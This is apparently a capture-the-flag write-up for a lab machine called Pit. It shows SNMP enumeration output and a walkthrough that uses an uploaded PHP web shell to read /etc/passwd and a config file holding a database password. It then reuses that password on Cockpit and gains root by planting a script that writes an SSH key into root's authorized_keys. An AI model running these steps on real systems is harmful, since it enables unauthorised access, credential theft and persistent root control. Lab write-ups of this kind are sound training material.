.1.3.6.1.2.1.25.4.2.1.2.567 = STRING: "scsi_eh_19"
.1.3.6.1.2.1.25.4.2.1.2.568 = STRING: "scsi_tmf_19"
.1.3.6.1.2.1.25.4.2.1.2.569 = STRING: "scsi_eh_20"
.1.3.6.1.2.1.25.4.2.1.2.570 = STRING: "scsi_tmf_20"
.1.3.6.1.2.1.25.4.2.1.2.571 = STRING: "scsi_eh_21"
.1.3.6.1.2.1.25.4.2.1.2.572 = STRING: "scsi_tmf_21"
.1.3.6.1.2.1.25.4.2.1.2.573 = STRING: "scsi_eh_22"
.1.3.6.1.2.1.25.4.2.1.2.574 = STRING: "scsi_tmf_22"
.1.3.6.1.2.1.25.4.2.1.2.575 = STRING: "scsi_eh_23"
.1.3.6.1.2.1.25.4.2.1.2.576 = STRING: "scsi_tmf_23"
.1.3.6.1.2.1.25.4.2.1.2.577 = STRING: "scsi_eh_24"
.1.3.6.1.2.1.25.4.2.1.2.578 = STRING: "scsi_tmf_24"
.1.3.6.1.2.1.25.4.2.1.2.579 = STRING: "scsi_eh_25"
.1.3.6.1.2.1.25.4.2.1.2.580 = STRING: "scsi_tmf_25"
.1.3.6.1.2.1.25.4.2.1.2.581 = STRING: "scsi_eh_26"
.1.3.6.1.2.1.25.4.2.1.2.582 = STRING: "scsi_tmf_26"
.1.3.6.1.2.1.25.4.2.1.2.583 = STRING: "scsi_eh_27"
.1.3.6.1.2.1.25.4.2.1.2.584 = STRING: "scsi_tmf_27"
.1.3.6.1.2.1.25.4.2.1.2.585 = STRING: "scsi_eh_28"
.1.3.6.1.2.1.25.4.2.1.2.586 = STRING: "scsi_tmf_28"
.1.3.6.1.2.1.25.4.2.1.2.587 = STRING: "scsi_eh_29"
.1.3.6.1.2.1.25.4.2.1.2.588 = STRING: "scsi_tmf_29"
.1.3.6.1.2.1.25.4.2.1.2.589 = STRING: "scsi_eh_30"
.1.3.6.1.2.1.25.4.2.1.2.590 = STRING: "scsi_tmf_30"
.1.3.6.1.2.1.25.4.2.1.2.628 = STRING: "kworker/1:1H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.643 = STRING: "scsi_eh_31"
.1.3.6.1.2.1.25.4.2.1.2.645 = STRING: "scsi_tmf_31"
.1.3.6.1.2.1.25.4.2.1.2.647 = STRING: "scsi_eh_32"
.1.3.6.1.2.1.25.4.2.1.2.648 = STRING: "scsi_tmf_32"
.1.3.6.1.2.1.25.4.2.1.2.685 = STRING: "kdmflush"
.1.3.6.1.2.1.25.4.2.1.2.694 = STRING: "kdmflush"
.1.3.6.1.2.1.25.4.2.1.2.719 = STRING: "xfsalloc"
.1.3.6.1.2.1.25.4.2.1.2.720 = STRING: "xfs_mru_cache"
.1.3.6.1.2.1.25.4.2.1.2.727 = STRING: "xfs-buf/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.732 = STRING: "xfs-conv/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.733 = STRING: "xfs-cil/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.734 = STRING: "xfs-reclaim/dm-"
.1.3.6.1.2.1.25.4.2.1.2.735 = STRING: "xfs-eofblocks/d"
.1.3.6.1.2.1.25.4.2.1.2.736 = STRING: "xfs-log/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.737 = STRING: "xfsaild/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.738 = STRING: "kworker/0:1H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.834 = STRING: "systemd-journal"
.1.3.6.1.2.1.25.4.2.1.2.867 = STRING: "systemd-udevd"
.1.3.6.1.2.1.25.4.2.1.2.931 = STRING: "kdmflush"
.1.3.6.1.2.1.25.4.2.1.2.944 = STRING: "xfs-buf/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.945 = STRING: "xfs-conv/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.946 = STRING: "xfs-cil/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.947 = STRING: "xfs-reclaim/dm-"
.1.3.6.1.2.1.25.4.2.1.2.948 = STRING: "xfs-eofblocks/d"
.1.3.6.1.2.1.25.4.2.1.2.949 = STRING: "xfs-log/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.950 = STRING: "xfsaild/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.960 = STRING: "jbd2/sda1-8"
.1.3.6.1.2.1.25.4.2.1.2.961 = STRING: "ext4-rsv-conver"
.1.3.6.1.2.1.25.4.2.1.2.986 = STRING: "auditd"
.1.3.6.1.2.1.25.4.2.1.2.988 = STRING: "sedispatch"
.1.3.6.1.2.1.25.4.2.1.2.1021 = STRING: "sssd"
.1.3.6.1.2.1.25.4.2.1.2.1022 = STRING: "VGAuthService"
.1.3.6.1.2.1.25.4.2.1.2.1023 = STRING: "vmtoolsd"
.1.3.6.1.2.1.25.4.2.1.2.1024 = STRING: "polkitd"
.1.3.6.1.2.1.25.4.2.1.2.1025 = STRING: "irqbalance"
.1.3.6.1.2.1.25.4.2.1.2.1029 = STRING: "dbus-daemon"
.1.3.6.1.2.1.25.4.2.1.2.1034 = STRING: "chronyd"
.1.3.6.1.2.1.25.4.2.1.2.1044 = STRING: "rngd"
.1.3.6.1.2.1.25.4.2.1.2.1055 = STRING: "sssd_be"
.1.3.6.1.2.1.25.4.2.1.2.1068 = STRING: "sssd_nss"
.1.3.6.1.2.1.25.4.2.1.2.1076 = STRING: "firewalld"
.1.3.6.1.2.1.25.4.2.1.2.1100 = STRING: "systemd-logind"
.1.3.6.1.2.1.25.4.2.1.2.1101 = STRING: "NetworkManager"
.1.3.6.1.2.1.25.4.2.1.2.1115 = STRING: "tuned"
.1.3.6.1.2.1.25.4.2.1.2.1118 = STRING: "sshd"
.1.3.6.1.2.1.25.4.2.1.2.1139 = STRING: "crond"
.1.3.6.1.2.1.25.4.2.1.2.1180 = STRING: "agetty"
.1.3.6.1.2.1.25.4.2.1.2.1188 = STRING: "nginx"
.1.3.6.1.2.1.25.4.2.1.2.1189 = STRING: "nginx"
.1.3.6.1.2.1.25.4.2.1.2.1190 = STRING: "nginx"
.1.3.6.1.2.1.25.4.2.1.2.1233 = STRING: "mysqld"
.1.3.6.1.2.1.25.4.2.1.2.1467 = STRING: "snmpd"
.1.3.6.1.2.1.25.4.2.1.2.1469 = STRING: "rsyslogd"
.1.3.6.1.2.1.25.4.2.1.2.24958 = STRING: "kworker/0:2-cgroup_pidlist_destroy"
.1.3.6.1.2.1.25.4.2.1.2.25154 = STRING: "kworker/u4:2-events_unbound"
.1.3.6.1.2.1.25.4.2.1.2.25157 = STRING: "kworker/1:3-memcg_kmem_cache"
.1.3.6.1.2.1.25.4.2.1.2.25160 = STRING: "kworker/1:4-cgroup_destroy"
.1.3.6.1.2.1.25.4.2.1.2.25174 = STRING: "anacron"
.1.3.6.1.2.1.25.4.2.1.2.25185 = STRING: "kworker/0:3-mm_percpu_wq"
.1.3.6.1.2.1.25.4.2.1.2.25214 = STRING: "kworker/0:5-events"
.1.3.6.1.2.1.25.4.2.1.2.25255 = STRING: "kworker/1:0-events_power_efficient"
.1.3.6.1.2.1.25.4.2.1.2.25296 = STRING: "kworker/u4:1-flush-253:0"
.1.3.6.1.2.1.25.4.2.1.2.25304 = STRING: "kworker/0:0-events"
.1.3.6.1.2.1.25.4.2.1.2.25318 = STRING: "kworker/1:1-cgroup_pidlist_destroy"
.1.3.6.1.2.1.25.4.2.1.2.25331 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25332 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25333 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25334 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25335 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25336 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25347 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25361 = STRING: "php-fpm"
[...]
.1.3.6.1.2.1.25.4.2.1.4.986 = STRING: "/sbin/auditd"
.1.3.6.1.2.1.25.4.2.1.4.988 = STRING: "/usr/sbin/sedispatch"
.1.3.6.1.2.1.25.4.2.1.4.1021 = STRING: "/usr/sbin/sssd"
.1.3.6.1.2.1.25.4.2.1.4.1022 = STRING: "/usr/bin/VGAuthService"
.1.3.6.1.2.1.25.4.2.1.4.1023 = STRING: "/usr/bin/vmtoolsd"
.1.3.6.1.2.1.25.4.2.1.4.1024 = STRING: "/usr/lib/polkit-1/polkitd"
.1.3.6.1.2.1.25.4.2.1.4.1025 = STRING: "/usr/sbin/irqbalance"
.1.3.6.1.2.1.25.4.2.1.4.1029 = STRING: "/usr/bin/dbus-daemon"
.1.3.6.1.2.1.25.4.2.1.4.1034 = STRING: "/usr/sbin/chronyd"
.1.3.6.1.2.1.25.4.2.1.4.1044 = STRING: "/sbin/rngd"
.1.3.6.1.2.1.25.4.2.1.4.1055 = STRING: "/usr/libexec/sssd/sssd_be"
.1.3.6.1.2.1.25.4.2.1.4.1068 = STRING: "/usr/libexec/sssd/sssd_nss"
.1.3.6.1.2.1.25.4.2.1.4.1076 = STRING: "/usr/libexec/platform-python"
.1.3.6.1.2.1.25.4.2.1.4.1100 = STRING: "/usr/lib/systemd/systemd-logind"
.1.3.6.1.2.1.25.4.2.1.4.1101 = STRING: "/usr/sbin/NetworkManager"
.1.3.6.1.2.1.25.4.2.1.4.1115 = STRING: "/usr/libexec/platform-python"
.1.3.6.1.2.1.25.4.2.1.4.1118 = STRING: "/usr/sbin/sshd"
.1.3.6.1.2.1.25.4.2.1.4.1139 = STRING: "/usr/sbin/crond"
.1.3.6.1.2.1.25.4.2.1.4.1180 = STRING: "/sbin/agetty"
.1.3.6.1.2.1.25.4.2.1.4.1188 = STRING: "nginx: master process /usr/sbin/nginx"
.1.3.6.1.2.1.25.4.2.1.4.1189 = STRING: "nginx: worker process"
.1.3.6.1.2.1.25.4.2.1.4.1190 = STRING: "nginx: worker process"
.1.3.6.1.2.1.25.4.2.1.4.1233 = STRING: "/usr/libexec/mysqld"
.1.3.6.1.2.1.25.4.2.1.4.1467 = STRING: "/usr/sbin/snmpd"
.1.3.6.1.2.1.25.4.2.1.4.1469 = STRING: "/usr/sbin/rsyslogd"
.1.3.6.1.2.1.25.4.2.1.4.24958 = ""
.1.3.6.1.2.1.25.4.2.1.4.25154 = ""
.1.3.6.1.2.1.25.4.2.1.4.25157 = ""
.1.3.6.1.2.1.25.4.2.1.4.25160 = ""
.1.3.6.1.2.1.25.4.2.1.4.25174 = STRING: "/usr/sbin/anacron"
[...]
.1.3.6.1.2.1.25.4.2.1.5.988 = ""
.1.3.6.1.2.1.25.4.2.1.5.1021 = STRING: "-i --logger=files"
.1.3.6.1.2.1.25.4.2.1.5.1022 = STRING: "-s"
.1.3.6.1.2.1.25.4.2.1.5.1023 = ""
.1.3.6.1.2.1.25.4.2.1.5.1024 = STRING: "--no-debug"
.1.3.6.1.2.1.25.4.2.1.5.1025 = STRING: "--foreground"
.1.3.6.1.2.1.25.4.2.1.5.1029 = STRING: "--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only"
.1.3.6.1.2.1.25.4.2.1.5.1034 = ""
.1.3.6.1.2.1.25.4.2.1.5.1044 = STRING: "-f --fill-watermark=0"
.1.3.6.1.2.1.25.4.2.1.5.1055 = STRING: "--domain implicit_files --uid 0 --gid 0 --logger=files"
.1.3.6.1.2.1.25.4.2.1.5.1068 = STRING: "--uid 0 --gid 0 --logger=files"
.1.3.6.1.2.1.25.4.2.1.5.1076 = STRING: "-s /usr/sbin/firewalld --nofork --nopid"
.1.3.6.1.2.1.25.4.2.1.5.1100 = ""
.1.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "--no-daemon"
.1.3.6.1.2.1.25.4.2.1.5.1115 = STRING: "-Es /usr/sbin/tuned -l -P"
.1.3.6.1.2.1.25.4.2.1.5.1118 = STRING: "-D -oCiphers=aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128"
.1.3.6.1.2.1.25.4.2.1.5.1139 = STRING: "-n"
.1.3.6.1.2.1.25.4.2.1.5.1180 = STRING: "-o -p -- \\u --noclear tty1 linux"
.1.3.6.1.2.1.25.4.2.1.5.1188 = ""
.1.3.6.1.2.1.25.4.2.1.5.1189 = ""
.1.3.6.1.2.1.25.4.2.1.5.1190 = ""
.1.3.6.1.2.1.25.4.2.1.5.1233 = STRING: "--basedir=/usr"
.1.3.6.1.2.1.25.4.2.1.5.1467 = STRING: "-LS0-6d -f"
.1.3.6.1.2.1.25.4.2.1.5.1469 = STRING: "-n"
.1.3.6.1.2.1.25.4.2.1.5.24958 = ""
.1.3.6.1.2.1.25.4.2.1.5.25154 = ""
.1.3.6.1.2.1.25.4.2.1.5.25157 = ""
.1.3.6.1.2.1.25.4.2.1.5.25160 = ""
.1.3.6.1.2.1.25.4.2.1.5.25174 = STRING: "-s"
.1.3.6.1.2.1.25.4.2.1.5.25185 = ""
[...]
.1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: /usr/bin/monitor
.1.3.6.1.4.1.8072.1.3.2.2.1.3.10.109.111.110.105.116.111.114.105.110.103 = STRING:
.1.3.6.1.4.1.8072.1.3.2.2.1.4.10.109.111.110.105.116.111.114.105.110.103 = STRING:
.1.3.6.1.4.1.8072.1.3.2.2.1.5.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 5
.1.3.6.1.4.1.8072.1.3.2.2.1.6.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: exec(1)
.1.3.6.1.4.1.8072.1.3.2.2.1.7.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: run-on-read(1)
.1.3.6.1.4.1.8072.1.3.2.2.1.20.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: permanent(4)
.1.3.6.1.4.1.8072.1.3.2.2.1.21.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: active(1)
.1.3.6.1.4.1.8072.1.3.2.3.1.1.10.109.111.110.105.116.111.114.105.110.103 = STRING: Memory usage
.1.3.6.1.4.1.8072.1.3.2.3.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: Memory usage
total used free shared buff/cache available
Mem: 3.8Gi 451Mi 3.0Gi 32Mi 356Mi 3.1Gi
Swap: 1.9Gi 0B 1.9Gi
Database status
OK - Connection to database successful.
System release info
CentOS Linux release 8.3.2011
SELinux Settings
user
Labeling MLS/ MLS/
SELinux User Prefix MCS Level MCS Range SELinux Roles
guest_u user s0 s0 guest_r
root user s0 s0-s0:c0.c1023 staff_r sysadm_r system_r unconfined_r
staff_u user s0 s0-s0:c0.c1023 staff_r sysadm_r unconfined_r
sysadm_u user s0 s0-s0:c0.c1023 sysadm_r
system_u user s0 s0-s0:c0.c1023 system_r unconfined_r
unconfined_u user s0 s0-s0:c0.c1023 system_r unconfined_r
user_u user s0 s0 user_r
xguest_u user s0 s0 xguest_r
login
Login Name SELinux User MLS/MCS Range Service
__default__ unconfined_u s0-s0:c0.c1023 *
michelle user_u s0 *
root unconfined_u s0-s0:c0.c1023 *
System uptime
03:24:53 up 1 day, 22:01, 0 users, load average: 0.14, 0.06, 0.01
.1.3.6.1.4.1.8072.1.3.2.3.1.3.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 31
.1.3.6.1.4.1.8072.1.3.2.3.1.4.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 0
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.1 = STRING: Memory usage
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.2 = STRING: total used free shared buff/cache available
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.3 = STRING: Mem: 3.8Gi 451Mi 3.0Gi 32Mi 356Mi 3.1Gi
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.4 = STRING: Swap: 1.9Gi 0B 1.9Gi
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.5 = STRING: Database status
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.6 = STRING: OK - Connection to database successful.
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.7 = STRING: System release info
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.8 = STRING: CentOS Linux release 8.3.2011
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.9 = STRING: SELinux Settings
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.10 = STRING: user
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.11 = STRING:
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.12 = STRING: Labeling MLS/ MLS/
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.13 = STRING: SELinux User Prefix MCS Level MCS Range SELinux Roles
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.14 = STRING:
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.15 = STRING: guest_u user s0 s0 guest_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.16 = STRING: root user s0 s0-s0:c0.c1023 staff_r sysadm_r system_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.17 = STRING: staff_u user s0 s0-s0:c0.c1023 staff_r sysadm_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.18 = STRING: sysadm_u user s0 s0-s0:c0.c1023 sysadm_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.19 = STRING: system_u user s0 s0-s0:c0.c1023 system_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.20 = STRING: unconfined_u user s0 s0-s0:c0.c1023 system_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.21 = STRING: user_u user s0 s0 user_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.22 = STRING: xguest_u user s0 s0 xguest_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.23 = STRING: login
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.24 = STRING:
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.25 = STRING: Login Name SELinux User MLS/MCS Range Service
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.26 = STRING:
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.27 = STRING: __default__ unconfined_u s0-s0:c0.c1023 *
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.28 = STRING: michelle user_u s0 *
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.29 = STRING: root unconfined_u s0-s0:c0.c1023 *
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.30 = STRING: System uptime
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.31 = STRING: 03:24:53 up 1 day, 22:01, 0 users, load average: 0.14, 0.06, 0.01
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.31 = No more variables left in this MIB View (It is past the end of the MIB tree)
We get user michelle from the output.
We also get the path STRING: /var/www/html/seeddms51x/seeddms.
Port 9090
Adding the host info to hosts and visit the page.
Searching intext:"CentOS Linux" intext:" Reuse my password for remote connections"
Yields results which suggests that the software installed is called Cockpit.
Searchsploit shows that there is an unauthenticated CSRF vulnerability.
Foothold
With the identified exploit from searchsploit, we upload the php shell and then try to execute a command.
URI http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=cat%20/etc/passwd
Attempted different techniques to get reverse shell but no success.
If we enumerate the directores with ls and try http://dms-pit.htb/seeddms51x/data/1048576/32/1.php?cmd=ls%20../../conf
we see the following files
settings.xml
settings.xml.template
stopwords.txt
We try http://dms-pit.htb/seeddms51x/data/1048576/33/1.php?cmd=cat ../../conf/settings.xml
Which only gives a blank screen. However, showing the source code shows that the browser doesn’t render the content as it is XML.
If we try http://dms-pit.htb/seeddms51x/data/1048576/35/1.php?cmd=cat /var/www/html/seeddms51x/conf/settings.xml
We see
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
</database>
mysql:ied^ieY6xoquu
This password works with the username michelle on port 9090.
Cockpit has a Terminal option which gives us an interactive shell.
Privesc
From the SNMPWalk output, we observe
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."monitoring" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."monitoring" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."monitoring" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."monitoring" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1)
means that it will be executed when read.
Looking at the script
[michelle@pit ~]$ file /usr/bin/monitor
/usr/bin/monitor: Bourne-Again shell script, ASCII text executable
[michelle@pit ~]$ cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
[michelle@pit ~]$
We have write access to /usr/local/monitoring
[michelle@pit ~]$ getfacl /usr/local/monitoring/
getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring/
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---
[michelle@pit ~]$
So we create a script which will add our public key to ssh root.
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJIXrK0+yIpcNuqutXDRp36VMfPIB6R9tVZgO7NSy4OHE3xdAR6co4QwNSdGcdkebh5QDElzXxSwA9a5mxYBXsb5MBfyllSghDuwQy4bajxgECKoqnFml+ntApx4KS5nn2fLrls67VhoLJPnJN8XMtAON1ZbTw/hc3oifiX6lvEWZ8RS9q2nD4g3C5nPhRAoEbL07KmEZHwfhnWjWs4mfg5UOiUKpXu5f0X8z3yiO4SVW2KtX8vwXbFrWr1+5QaPYRqn3QnDjguil3VbXLtG1jdWohhXGBlPVGjvvTVwjquqWBEN2nNtIUUF8XKKO/oJvea++9KdATvJPp92MMgFyE5hSQDL24KRKp9xiVWGz1B3/HobiSKja+HmL2LfMK+0qZaMgjXshX6Q3WjBbGtPTH44P53k2dtlaCcRTFOCzdwXFX4B00VelkxvP1aSAlbkGVbCwAMyG2Bz+GVwn1As7KiES5ARz70o1QYCZUDlnm99nz/XiMW6/AR+nUKzK9VkE= bob@kali
" > /root/.ssh/authorized_keys
To trigger monitor through run-on-read(1) with snmpwalk we execute the cmdline
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
Subsequently we can ssh in as root.
Read other posts